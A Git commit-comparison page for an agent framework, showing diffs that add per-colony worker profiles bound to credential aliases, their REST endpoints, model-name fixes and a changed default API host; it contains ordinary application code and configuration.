Compare commits

...

12 Commits

Author SHA1 Message Date
Timothy 74a283aab6 fix: runtime oauth issues 2026-05-04 20:44:07 -07:00
Timothy 569c715031 feat: allow credential assignment as worker profile 2026-05-04 12:01:43 -07:00
Richard Tang feabf32768 fix: worker context token 2026-05-03 11:45:37 -07:00
Richard Tang eee55ea8c7 chore: fix wrong model name 2026-05-03 11:35:05 -07:00
Richard Tang 78fffa63ec chore: ci and release doc
Release / Create Release (push) Waiting to run
2026-05-01 18:06:39 -07:00
Richard Tang 9a75d45351 chore: lint 2026-05-01 17:53:44 -07:00
Timothy 3a94f52009 feat: sync tool result contentful display 2026-05-01 17:44:19 -07:00
Timothy 522e0f511e fix: y-axis 2026-05-01 15:48:36 -07:00
Timothy e6310f1243 fix: normalize chart spec in renderer 2026-05-01 15:36:09 -07:00
Richard Tang 12ffacccab feat: tools config frontend grouping and tools cleanup 2026-05-01 15:28:40 -07:00
Timothy 8c36b1575c Merge branch 'feature/merge-to-file-ops' into feat/file-ops 2026-05-01 14:57:21 -07:00
Richard Tang a09eac06f1 feat: improve web search and consolidate browser open 2026-05-01 14:55:20 -07:00
89 changed files with 4074 additions and 1885 deletions
-1
View File
@@ -47,7 +47,6 @@
"Bash(grep -v ':0$')",
"Bash(curl -s -m 2 http://127.0.0.1:4002/sse -o /dev/null -w 'status=%{http_code} time=%{time_total}s\\\\n')",
"mcp__gcu-tools__browser_status",
"mcp__gcu-tools__browser_start",
"mcp__gcu-tools__browser_navigate",
"mcp__gcu-tools__browser_evaluate",
"mcp__gcu-tools__browser_screenshot",
@@ -214,7 +214,7 @@ Curated list of known browser automation edge cases with symptoms, causes, and f
| **Symptom** | `browser_open()` returns `"No group with id: XXXXXXX"` even though `browser_status` shows `running: true` |
| **Root Cause** | In-memory `_contexts` dict has a stale `groupId` from a Chrome tab group that was closed outside the tool (e.g. user closed the tab group) |
| **Detection** | `browser_status` returns `running: true` but `browser_open` fails with "No group with id" |
| **Fix** | Call `browser_stop()` to clear stale context from `_contexts`, then `browser_start()` again |
| **Fix** | Call `browser_stop()` to clear stale context from `_contexts`, then `browser_open(url)` to lazy-create a fresh one |
| **Code** | `tools/lifecycle.py:144-160` - `already_running` check uses cached dict without validating against Chrome |
| **Verified** | 2026-04-03 ✓ |
+2 -2
View File
@@ -407,7 +407,7 @@ Aden Hive supports **100+ LLM providers** via LiteLLM, giving users maximum flex
| **Anthropic** | Claude 3.5 Sonnet, Haiku, Opus | Default provider, best for reasoning |
| **OpenAI** | GPT-4, GPT-4 Turbo, GPT-4o | Function calling, vision |
| **OpenRouter** | Any OpenRouter catalog model | Uses `OPENROUTER_API_KEY` and `https://openrouter.ai/api/v1` |
| **Hive LLM** | `queen`, `kimi-2.5`, `GLM-5` | Uses `HIVE_API_KEY` and the Hive-managed endpoint |
| **Hive LLM** | `queen`, `kimi-k2.5`, `GLM-5` | Uses `HIVE_API_KEY` and the Hive-managed endpoint |
| **Google** | Gemini 1.5 Pro, Flash | Long context windows |
| **DeepSeek** | DeepSeek V3 | Cost-effective, strong reasoning |
| **Mistral** | Mistral Large, Medium, Small | Open weights, EU hosting |
@@ -435,7 +435,7 @@ DEFAULT_MODEL = "claude-haiku-4-5-20251001"
**Provider-Specific Notes**
- **OpenRouter**: store `provider` as `openrouter`, use the raw OpenRouter model ID in `model` (for example `x-ai/grok-4.20-beta`), and use `OPENROUTER_API_KEY`
- **Hive LLM**: store `provider` as `hive`, use Hive model names such as `queen`, `kimi-2.5`, or `GLM-5`, and use `HIVE_API_KEY`
- **Hive LLM**: store `provider` as `hive`, use Hive model names such as `queen`, `kimi-k2.5`, or `GLM-5`, and use `HIVE_API_KEY`
**For Development**
- Use cheaper/faster models (Haiku, GPT-4o-mini)
+3 -4
View File
@@ -72,17 +72,16 @@ Register an MCP server as a tool source for your agent.
"cwd": "../tools",
"description": "Aden tools..."
},
"tools_discovered": 6,
"tools_discovered": 5,
"tools": [
"web_search",
"web_scrape",
"file_read",
"file_write",
"pdf_read",
"example_tool"
"pdf_read"
],
"total_mcp_servers": 1,
"note": "MCP server 'tools' registered with 6 tools. These tools can now be used in event_loop nodes."
"note": "MCP server 'tools' registered with 5 tools. These tools can now be used in event_loop nodes."
}
```
@@ -94,7 +94,7 @@ def _list_aden_accounts() -> list[dict]:
client = AdenCredentialClient(
AdenClientConfig(
base_url=os.environ.get("ADEN_API_URL", "https://api.adenhq.com"),
base_url=os.environ.get("ADEN_API_URL", "https://app.open-hive.com"),
)
)
try:
+13 -1
View File
@@ -249,7 +249,7 @@ or find files. Mtime-sorted in files mode.
## Browser Automation (gcu-tools MCP)
- Use `browser_*` tools — `browser_open(url)` is the cold-start entry point \
(lazy-creates the context; no `browser_start` first). Then `browser_navigate`, \
(lazy-creates the context; no separate "start" call). Then `browser_navigate`, \
`browser_click`, `browser_type`, `browser_snapshot`, \
<!-- vision-only -->`browser_screenshot`, <!-- /vision-only -->`browser_scroll`, \
`browser_tabs`, `browser_close`, `browser_evaluate`, etc.
@@ -326,6 +326,18 @@ the rest.
  overall purpose. Validated up front — a bad cron, missing task, or \
malformed webhook path fails the call before anything is written, \
so you can retry with corrected input.
- ``worker_profiles`` (optional array) pass this ONLY when the \
colony needs multiple authorized accounts of the same vendor (two \
Slack workspaces, two Gmail accounts) so each worker calls the \
right one. Each entry: ``{name, integrations: {provider: alias}, \
task?, skill_name?, concurrency_hint?, prompt_override?, \
tool_filter?}``. ``alias`` is the account label the user assigned \
on hive.adenhq.com (e.g. ``work``, ``personal``); discover \
available aliases via ``get_account_info()``. If omitted, the \
colony has a single implicit ``default`` profile that uses each \
provider's primary account — that's the right call for almost \
every colony. Use ``update_worker_profile`` to swap a profile's \
alias later without rebuilding the colony.
- After this returns, the chat is over: the session locks immediately \
and the user gets a "compact and start a new session with you" \
button. So make your call to create_colony the last thing you do \
@@ -88,7 +88,6 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
"browser_basic": [
"browser_setup",
"browser_status",
"browser_start",
"browser_stop",
"browser_tabs",
"browser_open",
@@ -130,10 +129,7 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
# Research — paper search, Wikipedia, ad-hoc web scrape. Pair with
# browser_basic for richer site-by-site research; this category is the
# lightweight always-available fallback.
"research": [
"web_scrape",
"pdf_read"
],
"research": ["web_scrape", "pdf_read"],
# Security — defensive scanning and reconnaissance. Engineering-only
# surface; the rest of the queens shouldn't see port scanners.
"security": [
@@ -146,7 +142,7 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
"risk_score",
],
# Lightweight context helpers — good default for every queen.
"time_context": [
"context_awareness": [
"get_current_time",
"get_account_info",
],
@@ -182,7 +178,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Growth — data, experiments, competitor research; no security.
@@ -192,7 +188,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Product Strategy — user research + roadmaps; no security.
@@ -202,7 +198,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Finance — financial models (CSV/Excel heavy), market research.
@@ -213,7 +209,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Legal — reads contracts/PDFs, researches; no data/security.
@@ -223,7 +219,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
],
# Head of Brand & Design — visual refs, style guides; no data/security.
"queen_brand_design": [
@@ -232,17 +228,16 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
],
# Head of Talent — candidate pipelines, resumes; data + browser heavy.
"queen_talent": [
"file_ops",
"terminal_basic",
"spreadsheet_advanced",
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
],
# Head of Operations — processes, automation, observability.
"queen_operations": [
@@ -251,7 +246,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"spreadsheet_advanced",
"browser_basic",
"browser_interaction",
"time_context",
"context_awareness",
"charts",
],
}
@@ -17,7 +17,7 @@ Use browser nodes (with `tools: {policy: "all"}`) when:
## Available Browser Tools
All tools are prefixed with `browser_`:
- `browser_open`, `browser_navigate` preferred entry points; both lazy-create a browser context, so a single `browser_open(url)` covers the cold path. Use `browser_start` only to warm a profile without a URL or to recreate a context after `browser_stop`.
- `browser_open`, `browser_navigate` — both lazy-create the browser context, so a single `browser_open(url)` covers the cold path. To recover from a stale context, call `browser_stop` then `browser_open(url)` again.
- `browser_click`, `browser_click_coordinate`, `browser_type`, `browser_type_focused` — interact
- `browser_press` (with optional `modifiers=["ctrl"]` etc.) — keyboard shortcuts
- `browser_snapshot` — compact accessibility-tree read (structured)
@@ -289,6 +289,24 @@ class AdenSyncProvider(CredentialProvider):
"""
synced = 0
# Echo where we're talking and which key prefix we're using so a
# 401 can be diagnosed without enabling httpx debug logs. The key
# prefix is the safest discriminator: if the desktop minted a key
# against backend X but the runtime is hitting backend Y, the
# prefix in the log won't match the one the user finds in their
# ``hive_auth.bin`` (or in the dashboard's Keys panel).
cfg = self._client.config
api_key = cfg.api_key or ""
key_summary = (
f"{api_key[:8]}{api_key[-4:]}" if len(api_key) >= 12 else "<short>"
)
logger.info(
"AdenSync: GET %s/v1/credentials key=%s len=%d",
cfg.base_url.rstrip("/"),
key_summary,
len(api_key),
)
try:
integrations = self._client.list_integrations()
+9 -1
View File
@@ -714,7 +714,7 @@ class CredentialStore:
@classmethod
def with_aden_sync(
cls,
base_url: str = "https://api.adenhq.com",
base_url: str | None = None,
cache_ttl_seconds: int = 300,
local_path: str | None = None,
auto_sync: bool = True,
@@ -762,6 +762,14 @@ class CredentialStore:
logger.info("ADEN_API_KEY not set, using local-only credential storage")
return cls(storage=local_storage, **kwargs)
# Honor ADEN_API_URL when no explicit base_url was passed. The
# legacy default (https://api.adenhq.com) was a stale brand
# alias; the new canonical host is app.open-hive.com (matches
# cloud-deployed hive-backend) but local dev typically points
# at http://localhost:8889 via this env var.
if base_url is None:
base_url = os.environ.get("ADEN_API_URL", "https://app.open-hive.com")
# Try to setup Aden sync
try:
from .aden import (
+20
View File
@@ -825,6 +825,7 @@ class ColonyRuntime:
tools: list[Any] | None = None,
tool_executor: Callable | None = None,
stream_id: str | None = None,
profile_name: str | None = None,
) -> list[str]:
"""Spawn worker clones and start them in the background.
@@ -854,8 +855,20 @@ class ColonyRuntime:
raise RuntimeError("ColonyRuntime is not running")
from framework.agent_loop.agent_loop import AgentLoop
from framework.host.worker_profiles import get_worker_profile
from framework.storage.conversation_store import FileConversationStore
# Resolve the profile binding for this spawn. ``profile_name=None``
# means "use the default profile"; an unknown name silently falls
# back to default (the legacy single-template behavior). The
# resolved integrations map is threaded into Worker(...) so
# account_overrides() can pin its MCP tool calls.
_resolved_profile = (
get_worker_profile(self._colony_id, profile_name) if profile_name else None
)
_profile_name_resolved = _resolved_profile.name if _resolved_profile else (profile_name or "")
_profile_integrations = dict(_resolved_profile.integrations) if _resolved_profile else {}
# Resolve per-spawn vs colony-default code identity
spawn_spec = agent_spec or self._agent_spec
spawn_tools = tools if tools is not None else self._tools
@@ -1008,6 +1021,8 @@ class ColonyRuntime:
event_bus=self._scoped_event_bus,
colony_id=self._colony_id,
storage_path=worker_storage,
profile_name=_profile_name_resolved,
integrations=_profile_integrations,
)
self._workers[worker_id] = worker
@@ -1030,6 +1045,7 @@ class ColonyRuntime:
tasks: list[dict[str, Any]],
*,
tools_override: list[Any] | None = None,
profile_name: str | None = None,
) -> list[str]:
"""Spawn a batch of parallel workers, one per task spec.
@@ -1055,11 +1071,15 @@ class ColonyRuntime:
task_data = spec.get("data")
if task_data is not None and not isinstance(task_data, dict):
task_data = {"value": task_data}
# Per-task profile_name override beats the batch-level default,
# so a fan-out can mix profiles (e.g. half tasks routed to
# Slack:work and half to Slack:personal).
ids = await self.spawn(
task=task_text,
count=1,
input_data=task_data or {"task": task_text},
tools=tools_override,
profile_name=spec.get("profile_name") or profile_name,
)
worker_ids.extend(ids)
return worker_ids
+1 -1
View File
@@ -7,7 +7,7 @@ verify SOP gates before marking a task done. This gives cross-run memory
that the existing per-iteration stall detectors don't have.
The DB is driven by agents via the ``sqlite3`` CLI through
``execute_command_tool``. This module handles framework-side lifecycle:
``terminal_exec``. This module handles framework-side lifecycle:
creation, migration, queen-side bulk seeding, stale-claim reclamation.
Concurrency model:
+23 -1
View File
@@ -54,6 +54,11 @@ class WorkerInfo:
status: WorkerStatus
started_at: float = 0.0
result: WorkerResult | None = None
# Name of the colony's worker profile this worker was spawned from.
# Empty for legacy / single-template colonies. Surfaced in the UI so
# the user can see "Worker w_42 in colony X is using profile slack-work"
# and reason about which authorized account this run is touching.
profile_name: str = ""
class Worker:
@@ -79,6 +84,8 @@ class Worker:
colony_id: str = "",
persistent: bool = False,
storage_path: Path | None = None,
profile_name: str = "",
integrations: dict[str, str] | None = None,
):
self.id = worker_id
self.task = task
@@ -88,6 +95,12 @@ class Worker:
self._event_bus = event_bus
self._colony_id = colony_id
self._persistent = persistent
# Worker profile binding. ``integrations`` is a {provider_id: alias}
# map applied as default account overrides for every MCP tool call
# this worker makes (see CredentialStoreAdapter.account_overrides).
# An explicit ``account="..."`` arg on a tool call still wins.
self._profile_name = profile_name
self._integrations: dict[str, str] = dict(integrations or {})
# Canonical on-disk home for this worker (conversations, events,
# result.json, data). Required when seed_conversation() is used —
# we deliberately do NOT fall back to CWD, which previously caused
@@ -114,6 +127,7 @@ class Worker:
status=self.status,
started_at=self._started_at,
result=self._result,
profile_name=self._profile_name,
)
@property
@@ -173,8 +187,16 @@ class Worker:
exc_info=True,
)
# Pin MCP tool calls to this worker's profile-bound aliases. Empty
# mapping is a no-op so ephemeral workers and legacy single-profile
# colonies are unaffected. The contextvar is propagated to all
# awaited child coroutines, so every tool invocation downstream of
# ``execute`` sees the binding without further plumbing.
from aden_tools.credentials.store_adapter import account_overrides
try:
result = await self._agent_loop.execute(self._context)
with account_overrides(self._integrations):
result = await self._agent_loop.execute(self._context)
duration = time.monotonic() - self._started_at
if result.success:
+207
View File
@@ -0,0 +1,207 @@
"""Worker profile data model and per-colony persistence.
A colony today has a single worker template at ``{colony_dir}/worker.json``
spawned as N parallel clones with identical tools, prompt, and credentials.
Worker profiles let the queen declare multiple templates per colony, each
with its own credential aliases (e.g. one profile pinned to Slack workspace
"work" and another to "personal").
Layout::
{COLONIES_DIR}/{colony_name}/
worker.json # legacy / "default" profile
profiles/
slack-work/worker.json
slack-personal/worker.json
metadata.json # has worker_profiles: [{...}, ...]
The default profile keeps living at ``{colony_dir}/worker.json`` so existing
colonies and code that hardcodes that path stay correct. Named profiles live
under ``profiles/<name>/`` and are read through :func:`worker_spec_path`.
"""
from __future__ import annotations
import logging
import re
from dataclasses import asdict, dataclass, field
from pathlib import Path
from typing import Any
from framework.config import COLONIES_DIR
from framework.host.colony_metadata import (
colony_metadata_path,
load_colony_metadata,
update_colony_metadata,
)
logger = logging.getLogger(__name__)
DEFAULT_PROFILE_NAME = "default"
_PROFILE_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9_-]{0,63}$")
@dataclass
class WorkerProfile:
    """Template for a worker spawned within a colony.

    ``integrations`` maps provider id (``slack``, ``google``, ``github``) to
    the alias of the connected account this profile should use. The runtime
    sets these aliases as defaults on MCP tool calls; an explicit
    ``account="..."`` argument on a call still wins.
    """

    name: str
    task: str = ""
    skill_name: str = ""
    integrations: dict[str, str] = field(default_factory=dict)
    concurrency_hint: int | None = None
    prompt_override: str | None = None
    tool_filter: list[str] | None = None

    def to_dict(self) -> dict[str, Any]:
        """Serialize for metadata.json, omitting unset optional fields."""
        d = asdict(self)
        # Drop None fields so on-disk metadata stays tidy.
        for key in ("prompt_override", "tool_filter", "concurrency_hint"):
            if d.get(key) is None:
                d.pop(key, None)
        return d

    @classmethod
    def from_dict(cls, data: dict[str, Any]) -> WorkerProfile:
        """Build a profile from untrusted metadata, coercing field types.

        Malformed optional fields degrade to their defaults rather than
        raising, so a hand-edited metadata.json can't break profile loading.
        """
        hint = data.get("concurrency_hint")
        # ``bool`` is a subclass of ``int``; reject True/False explicitly so
        # a stray ``"concurrency_hint": true`` doesn't silently become 1.
        if type(hint) is not int or hint <= 0:
            hint = None
        return cls(
            name=str(data.get("name", "")).strip(),
            task=str(data.get("task", "")),
            skill_name=str(data.get("skill_name", "")),
            integrations={
                str(k): str(v)
                for k, v in (data.get("integrations") or {}).items()
                if str(k) and str(v)
            },
            concurrency_hint=hint,
            prompt_override=(data.get("prompt_override") or None),
            tool_filter=(
                list(data["tool_filter"])
                if isinstance(data.get("tool_filter"), list)
                else None
            ),
        )
def validate_profile_name(name: str) -> str | None:
    """Return an error message if ``name`` is invalid, else ``None``."""
    # Same pattern as _PROFILE_NAME_RE: one lowercase alphanumeric lead
    # character plus up to 63 of [a-z0-9_-].
    if isinstance(name, str) and re.match(r"^[a-z0-9][a-z0-9_-]{0,63}$", name):
        return None
    return (
        "profile name must be lowercase alphanumeric (with - or _), "
        "start with a letter/digit, and be ≤64 characters"
    )
def worker_spec_path(colony_name: str, profile_name: str | None = None) -> Path:
    """Return the on-disk path to a profile's ``worker.json``.

    The default / unnamed profile lives at ``{colony_dir}/worker.json``
    (legacy location). Named profiles live at
    ``{colony_dir}/profiles/{profile_name}/worker.json``.
    """
    base = COLONIES_DIR / colony_name
    # Falsy or "default" → the legacy single-template location.
    if profile_name and profile_name != DEFAULT_PROFILE_NAME:
        return base / "profiles" / profile_name / "worker.json"
    return base / "worker.json"
def list_worker_profiles(colony_name: str) -> list[WorkerProfile]:
    """Return the colony's declared worker profiles.

    Legacy colonies (no ``worker_profiles`` field in metadata.json) get a
    synthetic single-entry list with the default profile, so dispatch logic
    elsewhere can treat the profile registry as always non-empty.
    """
    declared = load_colony_metadata(colony_name).get("worker_profiles")
    fallback = [WorkerProfile(name=DEFAULT_PROFILE_NAME)]
    if not isinstance(declared, list) or not declared:
        return fallback

    accepted: list[WorkerProfile] = []
    names_seen: set[str] = set()
    for item in declared:
        if not isinstance(item, dict):
            continue
        candidate = WorkerProfile.from_dict(item)
        # Unnamed or duplicate entries are dropped silently; invalid names
        # get a warning so a hand-edited metadata.json stays debuggable.
        if not candidate.name or candidate.name in names_seen:
            continue
        if validate_profile_name(candidate.name) is not None:
            logger.warning(
                "worker_profiles: skipping invalid profile name %r in colony %s",
                candidate.name,
                colony_name,
            )
            continue
        names_seen.add(candidate.name)
        accepted.append(candidate)
    return accepted or fallback
def get_worker_profile(colony_name: str, profile_name: str) -> WorkerProfile | None:
    """Return one profile by name, or ``None`` if not declared."""
    return next(
        (p for p in list_worker_profiles(colony_name) if p.name == profile_name),
        None,
    )
def save_worker_profiles(colony_name: str, profiles: list[WorkerProfile]) -> list[WorkerProfile]:
    """Persist ``profiles`` to the colony's metadata.json.

    Validates names, deduplicates, and refuses to write an empty list (use
    the default profile representation instead). Returns the canonicalized
    list as written.
    """
    if not colony_metadata_path(colony_name).parent.exists():
        raise FileNotFoundError(f"Colony '{colony_name}' not found")

    written: list[WorkerProfile] = []
    names: set[str] = set()
    for candidate in profiles:
        problem = validate_profile_name(candidate.name)
        if problem is not None:
            raise ValueError(problem)
        if candidate.name in names:
            raise ValueError(f"duplicate worker profile name: {candidate.name!r}")
        names.add(candidate.name)
        written.append(candidate)

    # Never persist an empty registry — dispatch assumes at least "default".
    if not written:
        written = [WorkerProfile(name=DEFAULT_PROFILE_NAME)]
    update_colony_metadata(
        colony_name, {"worker_profiles": [p.to_dict() for p in written]}
    )
    return written
def upsert_worker_profile(colony_name: str, profile: WorkerProfile) -> list[WorkerProfile]:
    """Insert or replace a single profile, preserving siblings."""
    problem = validate_profile_name(profile.name)
    if problem is not None:
        raise ValueError(problem)
    # Replace-by-name: drop any same-named sibling, append the new profile,
    # and let save_worker_profiles() re-validate and persist the set.
    siblings = [
        p for p in list_worker_profiles(colony_name) if p.name != profile.name
    ]
    return save_worker_profiles(colony_name, siblings + [profile])
def delete_worker_profile(colony_name: str, profile_name: str) -> bool:
    """Remove a profile by name. Returns True if a profile was removed.

    Refuses to remove the default profile so dispatch always has a fallback.
    """
    if profile_name == DEFAULT_PROFILE_NAME:
        raise ValueError("cannot delete the default worker profile")
    before = list_worker_profiles(colony_name)
    after = [p for p in before if p.name != profile_name]
    if len(after) == len(before):
        # Nothing matched — no write, report "not removed".
        return False
    save_worker_profiles(colony_name, after)
    return True
+3 -3
View File
@@ -326,7 +326,7 @@
"supports_vision": false
},
{
"id": "kimi-2.5",
"id": "kimi-k2.5",
"label": "Kimi 2.5 - Via Hive",
"recommended": false,
"max_tokens": 32768,
@@ -489,8 +489,8 @@
"recommended": true
},
{
"id": "kimi-2.5",
"label": "kimi-2.5",
"id": "kimi-k2.5",
"label": "kimi-k2.5",
"recommended": false
},
{
+2 -2
View File
@@ -52,11 +52,11 @@ _DEFAULT_LOCAL_SERVERS: dict[str, dict[str, Any]] = {
"args": ["run", "python", "files_server.py", "--stdio"],
},
"terminal-tools": {
"description": "Terminal capabilities: process exec, background jobs, PTY sessions, fs search. Bash-only on POSIX.",
"description": "Terminal capabilities",
"args": ["run", "python", "terminal_tools_server.py", "--stdio"],
},
"chart-tools": {
"description": "BI/financial chart + diagram rendering: ECharts, Mermaid. Returns spec + downloadable PNG; chat embeds live.",
"description": "BI/financial chart + diagram rendering: ECharts, Mermaid",
"args": ["run", "python", "chart_tools_server.py", "--stdio"],
},
}
+1 -1
View File
@@ -158,7 +158,7 @@ cookie consent banners if they block content.
- If `browser_snapshot` fails, try `browser_get_text` with a narrow
selector as fallback.
- If `browser_open` fails or the page seems stale, `browser_stop`
`browser_start` retry.
`browser_open(url)` to lazy-create a fresh context.
## `browser_evaluate`
+4 -5
View File
@@ -683,11 +683,10 @@ class Orchestrator:
# Set per-execution data_dir and agent_id so data tools and
# spillover files share the same session-scoped directory, and
# so MCP tools whose server-side schemas mark agent_id as a
# required field (execute_command_tool's bash_*, etc.) get a valid
# value injected even on
# registry instances where agent_loader.setup() didn't populate
# the session_context. Without this, FastMCP rejects those
# calls with "agent_id is a required property".
# required field get a valid value injected even on registry
# instances where agent_loader.setup() didn't populate the
# session_context. Without this, FastMCP rejects those calls
# with "agent_id is a required property".
_ctx_token = None
if self._storage_path:
from framework.loader.tool_registry import ToolRegistry
+7 -1
View File
@@ -359,6 +359,7 @@ async def create_queen(
queen_goal,
queen_loop_config as _base_loop_config,
)
from framework.config import get_max_tokens as _get_max_tokens
from framework.agents.queen.nodes import (
_QUEEN_INCUBATING_TOOLS,
_QUEEN_INDEPENDENT_TOOLS,
@@ -982,7 +983,12 @@ async def create_queen(
llm=session.llm,
available_tools=queen_tools,
goal_context=queen_goal.to_prompt_context(),
max_tokens=lc.get("max_tokens", 8192),
# Honor configuration.json (llm.max_tokens) instead of
# hard-defaulting to 8192. The legacy fallback ignored both
# the user's saved ceiling AND the model's actual output
# capacity (e.g. glm-5.1 / kimi-k2.5 both support 32k out),
# which silently truncated long tool-emitting turns.
max_tokens=lc.get("max_tokens", _get_max_tokens()),
stream_id="queen",
execution_id=session.id,
dynamic_tools_provider=phase_state.get_current_tools,
+141
View File
@@ -501,5 +501,146 @@ async def _import_multi_root(
)
def _find_workers_bound_to_profile(request: web.Request, colony_name: str, profile_name: str) -> list[str]:
    """Return live worker IDs bound to ``(colony_name, profile_name)``.

    Walks every live session's ColonyRuntime workers map. Used to refuse
    profile deletes / renames while workers are still using the binding —
    the contextvar that pins a worker's MCP account lookups is set at
    spawn time and a profile mutation underneath a running worker would
    leave its tool calls pointing at a removed alias on the next turn.
    """
    manager = request.app.get("manager")
    if manager is None:
        return []
    try:
        sessions = manager.list_sessions()
    except Exception:
        # Best-effort scan: if we can't enumerate sessions, don't block
        # the caller — report "no bound workers".
        return []
    bound: list[str] = []
    for s in sessions:
        runtime = getattr(s, "colony", None) or getattr(s, "colony_runtime", None)
        if runtime is None:
            continue
        if getattr(runtime, "_colony_id", None) != colony_name:
            continue
        try:
            for info in runtime.list_workers():
                if info.profile_name != profile_name:
                    continue
                # ``status`` may be a WorkerStatus enum or a plain string
                # depending on runtime version. The old code tested the
                # enum itself against a set of strings, which never
                # matches an Enum member — normalize to the bare status
                # word so both "WorkerStatus.RUNNING" and "running" (and
                # an enum's ``.value``) compare correctly.
                status = getattr(info.status, "value", info.status)
                if str(status).lower().rsplit(".", 1)[-1] in {"running", "pending"}:
                    bound.append(info.id)
        except Exception:
            continue
    return bound
async def handle_list_worker_profiles(request: web.Request) -> web.Response:
    """GET /api/colonies/{colony_name}/worker_profiles"""
    colony_name = request.match_info["colony_name"]
    bad_name = _validate_colony_name(colony_name)
    if bad_name:
        return web.json_response({"error": bad_name}, status=400)
    if not (COLONIES_DIR / colony_name).exists():
        return web.json_response({"error": f"colony '{colony_name}' not found"}, status=404)

    from framework.host.worker_profiles import list_worker_profiles

    payload = [p.to_dict() for p in list_worker_profiles(colony_name)]
    return web.json_response({"worker_profiles": payload})
async def handle_upsert_worker_profile(request: web.Request) -> web.Response:
    """POST /api/colonies/{colony_name}/worker_profiles — create or replace one profile.

    Body: ``{name, integrations?, task?, skill_name?, concurrency_hint?,
    prompt_override?, tool_filter?}``. Existing siblings are
    preserved; an existing profile with the same ``name`` is replaced
    (so the desktop can use this for both add and edit).
    """
    colony_name = request.match_info["colony_name"]
    err = _validate_colony_name(colony_name)
    if err:
        return web.json_response({"error": err}, status=400)
    if not (COLONIES_DIR / colony_name).exists():
        return web.json_response({"error": f"colony '{colony_name}' not found"}, status=404)
    try:
        body = await request.json()
    except Exception:
        return web.json_response({"error": "invalid JSON body"}, status=400)
    if not isinstance(body, dict):
        return web.json_response({"error": "body must be a JSON object"}, status=400)

    from framework.host.worker_profiles import (
        WorkerProfile,
        upsert_worker_profile,
        validate_profile_name,
    )

    profile = WorkerProfile.from_dict(body)
    name_err = validate_profile_name(profile.name)
    if name_err:
        return web.json_response({"error": name_err}, status=400)
    try:
        saved = upsert_worker_profile(colony_name, profile)
    except FileNotFoundError as exc:
        # Colony directory vanished between the existence check above and
        # the write (e.g. a concurrent delete). That is "not found", not a
        # malformed request — the old 400 mislabeled it.
        return web.json_response({"error": str(exc)}, status=404)
    except ValueError as exc:
        return web.json_response({"error": str(exc)}, status=400)
    return web.json_response({"worker_profiles": [p.to_dict() for p in saved]}, status=201)
async def handle_delete_worker_profile(request: web.Request) -> web.Response:
    """DELETE /api/colonies/{colony_name}/worker_profiles/{profile_name}.

    Refused with 409 + ``bound_workers`` listing if a live worker is
    bound to the profile, so the user can stop those workers before
    pruning the binding.
    """
    colony_name = request.match_info["colony_name"]
    profile_name = request.match_info["profile_name"]
    bad = _validate_colony_name(colony_name)
    if bad:
        return web.json_response({"error": bad}, status=400)
    if not (COLONIES_DIR / colony_name).exists():
        return web.json_response({"error": f"colony '{colony_name}' not found"}, status=404)

    # Live workers spawned from this profile pinned their MCP account
    # aliases at spawn time — refuse the delete rather than strand them.
    busy = _find_workers_bound_to_profile(request, colony_name, profile_name)
    if busy:
        payload = {
            "error": "profile is bound to live workers; stop them first",
            "bound_workers": busy,
        }
        return web.json_response(payload, status=409)

    from framework.host.worker_profiles import delete_worker_profile

    try:
        was_removed = delete_worker_profile(colony_name, profile_name)
    except ValueError as exc:
        return web.json_response({"error": str(exc)}, status=400)
    if not was_removed:
        return web.json_response({"error": f"profile '{profile_name}' not found"}, status=404)
    return web.json_response({"deleted": True, "profile_name": profile_name})
def register_routes(app: web.Application) -> None:
    """Wire colony import and worker-profile endpoints onto ``app``."""
    router = app.router
    router.add_post("/api/colonies/import", handle_import_colony)
    # Collection path serves both list (GET) and add-or-edit (POST).
    profiles_path = "/api/colonies/{colony_name}/worker_profiles"
    router.add_get(profiles_path, handle_list_worker_profiles)
    router.add_post(profiles_path, handle_upsert_worker_profile)
    router.add_delete(
        profiles_path + "/{profile_name}",
        handle_delete_worker_profile,
    )
@@ -62,6 +62,7 @@ def _worker_info_to_dict(info) -> dict:
"status": str(info.status),
"started_at": info.started_at,
"result": result_dict,
"profile_name": getattr(info, "profile_name", "") or "",
}
@@ -235,10 +236,6 @@ _SYSTEM_TOOLS: frozenset[str] = frozenset(
{
"get_account_info",
"get_current_time",
"bash_kill",
"bash_output",
"execute_command_tool",
"example_tool",
}
)
@@ -43,6 +43,21 @@ def _get_store(request: web.Request) -> CredentialStore:
return request.app["credential_store"]
def _reset_credential_adapter_cache() -> None:
    """Clear the memoized CredentialStoreAdapter so the next call re-syncs.

    The adapter cache is keyed on ``(id(specs), ADEN_API_KEY)``; without
    this reset, a key save/delete done after process startup is invisible
    to in-process MCP tool calls until restart.
    """
    try:
        # Import inside the function so this module has no hard import-time
        # dependency on aden_tools; the broad except keeps a missing or
        # renamed private helper from breaking the credential-save path —
        # worst case the stale cache simply persists until restart, which
        # is why we log a warning instead of raising.
        from aden_tools.credentials.store_adapter import _reset_default_adapter_cache

        _reset_default_adapter_cache()
    except Exception:
        logger.warning("Failed to reset credential adapter cache", exc_info=True)
def _invalidate_queen_credentials_cache(request: web.Request) -> None:
"""Force every live Queen session to rebuild its ambient credentials block.
@@ -158,6 +173,12 @@ async def handle_save_credential(request: web.Request) -> web.Response:
save_aden_api_key(key)
# Make the new key visible to the in-process AdenSyncProvider on
